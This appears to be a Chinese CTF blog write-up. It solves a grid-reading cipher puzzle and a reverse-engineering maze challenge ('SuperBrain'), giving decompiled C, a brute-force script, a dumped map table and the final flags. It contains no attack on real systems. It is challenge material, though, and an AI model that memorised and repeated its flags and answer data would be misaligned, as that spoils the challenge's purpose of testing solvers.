+5&?#!.03!%=@=101
0?(*~#??.+)%&.7^8
=1%*^=$5$7@@8>&*9
9@0185(+7)<%3#@^4
&@@<.)$3*#%%<<*++
.@.?=~**+!==65^@&

从第一个开始,依次往下一行往右两格

得到下面的

image-20210131130246955

flag{WUUHUUTAKEOFF}

SuperBrain

直接进入Check里面看看

Gamemaps是一个char[][][36] [7] [7] 的数组

每次传入runGame的是后面两维,也就是[7] [7] 可能是一个迷宫

Answer是一个char

进入rungame

红框部分就相当于

menset(v19,0,sizeof(v19))

之后的代码是比较复杂的运算,由于函数特殊,可以直接dump下来爆破每一位Answer

然后在CANLog.asc里面找到了Gamemap

image-20210131194638620

这里每一行8个十六进制 但是最后一个都是00 忽略掉之后就是每行7个 ,一共252行

我们的runGame要执行36次 而 252 / 36 = 7 印证了我们之前的推测 每一次的map都是一个7 * 7的矩阵

然后我们进入PrintFlag

flag由此得到 我们还缺少 字典CharDict 和 偏移OfsBas

IDA搜索字符串 发现类似字典的东西 然后跟进去找到字典和偏移

爆破脚本

#include<stdio.h>

char map[36][7][7];

unsigned char __fastcall runGame(char (*gamemap)[7], char startPoint)
{
  int v2; // r18
  char *v3; // r7
  char *v4; // r6
  int v5; // ctr
  char v6; // r4
  char v7; // r5
  int v8; // r17
  int v9; // r6
  int v10; // r19
  char *v11; // r5
  char *v12; // r4
  char *v13; // r4
  char *v14; // r5
  char *v15; // r20
  char *v16; // r3
  int v17; // r6
  char v19[61]={0}; // [sp+7h] [-79h] BYREF

  v2 = startPoint;
  
  v8 = -1;
  v9 = 0;
  v10 = 0;
  do
  {
    v11 = &v19[7 * v9];
    v12 = &(*gamemap)[7 * v9 - 1];
    do
    {
      *++v11 = *++v12;
      ++v10;
    }
    while ( ((v10 - 7) & 1) != 0 );
    for ( ; v10 < 7; v10 += 2 )
    {
      v13 = v12 + 1;
      v14 = v11 + 1;
      *v14 = *v13;
      v12 = v13 + 1;
      v11 = v14 + 1;
      *v11 = *v12;
    }
    ++v9;
    v10 = 0;
  }
  while ( v9 < 7 );
  v2 = (char)v2;
LABEL_10:
  v15 = &v19[7 * v2 + 1];
  while ( v10 < 7 && v2 >= 0 && v2 < 7 )
  {
    v16 = &v15[v10];
    v17 = v15[v10];
    if ( v2 % 2 )
    {
      if ( v15[v10] )
      {
        if ( v17 == 1 )
        {
          *v16 = 0;
          v8 = 0;
          --v2;
          goto LABEL_10;
        }
        if ( v17 != 2 )
        {
          if ( v17 != 3 )
            return v8 == 1;
          *v16 = 2;
          v8 = 2;
          ++v2;
          goto LABEL_10;
        }
        *v16 = 1;
        v8 = 1;
        if ( ++v10 >= 0 )
          goto LABEL_10;
      }
      else
      {
        *v16 = 3;
        v8 = 3;
        if ( --v10 >= 0 )
          goto LABEL_10;
      }
      return v8 == 1;
    }
    if ( v15[v10] )
    {
      if ( v17 == 1 )
      {
        *v16 = 2;
        v8 = 2;
        ++v2;
        goto LABEL_10;
      }
      if ( v17 != 2 )
      {
        if ( v17 != 3 )
          return v8 == 1;
        *v16 = 0;
        v8 = 0;
        --v2;
        goto LABEL_10;
      }
      *v16 = 3;
      v8 = 3;
      if ( --v10 >= 0 )
        goto LABEL_10;
      return v8 == 1;
    }
    *v16 = 1;
    v8 = 1;
    if ( ++v10 < 0 )
      return v8 == 1;
  }
  return v8 == 1;
}

int main()
{
	freopen("result.txt","r",stdin);
	char res[36]={0};
	for(int i=0;i<36;i++)
		for(int j=0;j<7;j++)
			for(int k=0;k<7;k++)
				scanf("%d",&map[i][j][k]);
	for(int i=0;i<36;i++)
	{
		for(int j=0;j<=0xff;j++)
		{
			if(runGame(map[i],j))
			{
				res[i]=j;
				printf("%d %d\n",i,j);
			}
		}
	}
	for(int i=0;i<36;i++)
		printf("%c",res[i]);
	printf("\n");
	char wow[] ={
  0x17, 0x06, 0x0A, 0x20, 0x2D, 0x0B, 0x39, 0x01, 0x0A, 0x10, 
  0x5E, 0x01, 0x1A, 0x0F, 0x51, 0x59, 0x06, 0x1F, 0x0E, 0x09, 
  0x23, 0x47, 0x03, 0x0A, 0x38, 0x05, 0x48, 0x23, 0x02, 0x0A, 
  0x12, 0x33, 0x1D, 0x1F, 0x48, 0x15};
	char dict[]="0123456789abcdef-";
	for(int i=0;i<36;i++)
	{
		printf("%c",dict[(wow[i]+res[i])%17]);
	}
	return 0;
}

result.txt

01 00 00 00 00 00 00
03 00 02 02 03 01 03 
01 03 02 01 02 02 01 
03 02 03 01 00 01 00 
03 03 00 01 02 01 00 
00 03 02 02 02 01 03 
02 02 02 02 01 02 03 
00 00 00 00 00 01 00 
00 02 02 02 01 01 01 
00 02 03 02 02 00 01 
00 03 01 00 02 00 01 
00 00 02 01 03 01 01 
03 00 01 02 02 00 02 
03 03 03 00 02 03 03 
00 02 02 00 00 02 01 
01 03 00 03 01 00 02 
00 01 01 00 02 03 03 
03 01 00 00 02 00 02 
03 03 03 03 03 02 01 
03 03 00 00 03 02 02 
00 02 03 01 02 01 00 
03 02 01 03 00 01 01 
01 00 02 00 01 01 01 
01 00 00 03 02 02 00 
01 03 02 02 01 02 01 
00 01 03 03 01 03 01 
02 03 02 00 02 01 03 
03 02 00 03 03 02 01 
01 00 00 00 02 02 02 
01 03 00 03 03 00 01 
03 03 03 01 00 03 01 
02 01 00 01 00 00 02 
03 00 00 02 02 03 01 
03 03 00 01 02 01 01 
03 03 03 00 00 03 00 
01 02 01 00 01 01 00 
02 03 03 03 00 01 00 
03 03 02 01 03 03 02 
01 02 00 00 01 03 03 
00 03 01 01 00 03 03 
00 02 03 01 02 02 03 
00 00 02 00 03 02 03 
01 02 00 02 00 00 03 
03 02 03 03 03 00 02 
02 00 01 02 01 00 01 
02 03 02 01 02 03 03 
02 00 02 03 02 00 02 
03 03 01 01 02 01 02 
00 00 03 03 03 01 02 
01 02 02 02 03 01 01 
00 02 00 02 02 03 02 
03 03 03 02 03 02 03 
03 00 02 00 02 02 03 
00 02 02 02 01 02 01 
02 03 02 01 02 00 00 
00 00 03 03 00 03 03 
00 00 00 01 03 03 03 
02 03 01 00 00 01 02 
00 00 00 02 02 00 01 
02 02 02 02 00 00 03 
00 03 03 00 00 01 03 
00 01 03 01 02 00 01 
00 03 02 02 02 02 02 
00 00 00 00 02 03 00 
02 01 00 00 03 03 01 
03 01 03 01 01 02 01 
00 02 02 03 03 01 02 
03 00 02 00 02 01 02 
01 02 02 01 03 01 03 
01 02 03 03 01 02 01 
03 01 03 01 00 01 01 
00 03 03 03 00 03 02 
00 01 03 03 00 01 03 
03 03 02 00 02 00 01 
00 00 00 01 03 02 01 
03 03 00 02 03 00 03 
00 02 03 03 02 03 01 
03 02 01 00 00 01 01 
01 03 03 01 00 03 03 
00 00 00 00 02 03 02 
03 02 03 03 02 02 00 
00 00 01 00 00 03 02 
02 01 02 03 02 01 02 
00 03 02 03 02 03 00 
00 02 00 01 02 02 03 
00 02 02 01 03 01 03 
02 00 03 02 03 01 02 
02 03 00 02 00 00 02 
03 00 01 00 01 03 02 
00 01 02 02 01 01 02 
03 00 03 01 03 03 02 
02 00 03 00 01 00 00 
03 03 02 03 00 02 00 
03 00 00 02 00 02 01 
00 03 00 03 02 03 00 
00 01 02 02 03 02 00 
02 02 01 00 02 03 01 
01 02 03 01 03 02 03 
00 00 00 00 00 02 02 
00 01 03 01 00 02 00 
01 01 00 01 03 00 03 
03 03 01 03 01 01 02 
03 00 01 00 01 02 03 
02 03 02 03 01 03 01 
03 02 00 02 01 01 00 
01 00 01 00 01 00 02 
03 02 03 01 03 02 00 
00 01 00 02 01 02 01 
02 02 00 02 03 03 00 
02 00 02 03 02 00 02 
03 02 02 01 02 00 00 
03 02 02 03 03 02 00 
02 02 01 03 00 00 00 
03 00 01 00 02 02 00 
00 02 03 00 00 01 02 
03 03 01 00 00 03 00 
03 01 02 02 00 03 03 
00 02 00 02 03 00 01 
03 02 03 01 00 01 02 
02 02 02 01 02 02 03 
03 03 00 02 02 03 01 
03 01 03 01 01 00 02 
00 03 02 00 00 02 00 
00 00 01 01 03 03 02 
01 02 03 00 02 02 01 
02 02 03 02 01 00 03 
01 01 00 01 02 03 03 
02 03 03 00 03 02 00 
03 03 00 01 00 00 00 
01 00 01 03 03 01 01 
02 03 02 00 02 00 02 
02 01 01 00 01 00 03 
00 03 02 03 00 03 03 
00 00 00 03 02 00 00 
01 03 00 00 03 03 01 
00 01 02 01 01 01 03 
03 01 01 01 02 03 03 
03 02 01 02 01 02 00 
01 02 02 03 03 01 00 
00 03 00 03 02 03 03 
03 01 00 00 01 00 01 
03 03 03 01 02 01 00 
03 01 00 02 03 00 02 
00 02 02 02 01 00 00 
00 00 00 01 01 02 00 
01 02 02 01 00 02 02 
00 03 00 02 00 00 03 
03 00 03 01 03 02 00 
03 00 00 03 03 02 02 
03 00 03 03 01 02 01 
03 02 03 03 03 03 00 
00 00 00 03 00 01 01 
02 00 03 01 03 02 00 
01 00 02 02 02 01 01 
02 02 00 03 01 00 01 
01 03 01 02 03 01 01 
02 00 01 03 03 02 02 
03 03 03 03 03 01 00 
03 00 03 03 00 00 03 
00 02 00 01 01 02 01 
01 03 03 00 00 02 00 
00 02 00 01 02 02 00 
03 03 02 00 01 03 03 
02 02 02 01 02 01 03 
00 03 03 02 00 01 02 
00 03 02 00 00 02 01 
03 02 01 01 02 03 01 
03 03 03 03 03 03 00 
01 00 02 01 00 00 02 
01 03 03 00 00 01 00 
00 00 02 01 00 02 03 
03 02 03 00 01 01 00 
03 03 02 03 00 03 00 
03 02 00 02 01 02 01 
03 03 00 03 00 00 02 
03 01 02 03 03 00 01 
03 02 02 00 03 00 02 
00 03 01 01 02 00 02 
02 03 02 01 00 00 02 
01 01 02 00 00 01 02 
02 02 01 02 00 02 01 
00 00 00 00 03 03 00 
00 01 00 02 03 02 00 
02 03 00 03 01 03 01 
01 02 02 02 01 00 03 
03 01 02 01 01 00 01 
00 02 00 03 03 02 00 
03 03 02 01 02 00 03 
03 00 00 03 00 00 03 
02 00 00 02 01 01 00 
03 03 00 02 03 00 03 
03 02 00 01 01 01 01 
00 02 03 01 00 03 01 
00 03 01 03 01 00 03 
03 01 02 02 00 03 00 
01 03 00 00 03 02 02 
02 03 03 01 00 03 02 
02 03 00 02 00 01 03 
00 02 02 03 00 02 02 
02 02 00 01 01 01 03 
00 03 01 02 03 01 00 
03 02 02 01 01 02 01 
01 01 01 02 00 00 00 
00 00 02 03 01 00 01 
02 00 03 00 01 00 02 
03 02 00 03 03 01 00 
01 03 00 00 01 00 03 
03 00 03 02 01 03 01 
03 01 01 01 01 00 02 
01 00 03 02 00 03 00 
02 02 02 01 00 01 01 
03 00 00 03 01 02 01 
03 03 03 01 03 01 01 
00 02 02 01 01 00 00 
02 02 03 03 03 00 01 
02 02 01 03 02 02 00 
02 00 03 00 00 03 03 
03 02 00 01 01 00 01 
03 00 00 03 02 02 01 
00 01 03 03 03 01 01 
03 02 02 03 03 00 01 
03 01 03 00 01 00 03 
02 01 00 01 01 01 02 
01 01 02 03 02 01 00 
01 01 02 00 03 02 01 
03 01 03 00 00 03 01 
03 00 01 02 00 00 03 
02 02 03 02 03 01 03 
02 02 03 03 03 01 02 
03 02 03 03 00 01 00 
03 03 02 02 00 03 03 
02 01 03 00 02 02 00 
03 01 03 02 00 00 03 
00 02 03 03 03 02 00 
02 03 00 01 03 01 02 
00 01 01 02 02 01 02 
00 03 01 02 01 03 02 
00 03 02 03 01 00 01 
03 03 01 03 03 00 02 
01 02 01 03 00 02 03 
00 01 02 03 01 01 02 
02 01 00 03 00 02 01 
03 03 00 02 03 01 02 
02 02 03 03 02 03 01 
03 02 02 03 00 02 03 
01 00 02 00 02 03 00 
02 01 03 00 00 03 00 
02 03 00 00 01 02 00 
03 03 00 02 00 01 01 
03 00 03 02 01 02 00 
00 03 02 01 00 02 02 
02 03 02 02 02 00 01 

flag

flag{ace40f94-1b3d-d97f-f256-bb726e611fa7}

问卷调查

NC Game

发表评论

邮箱地址不会被公开。 必填项已用*标注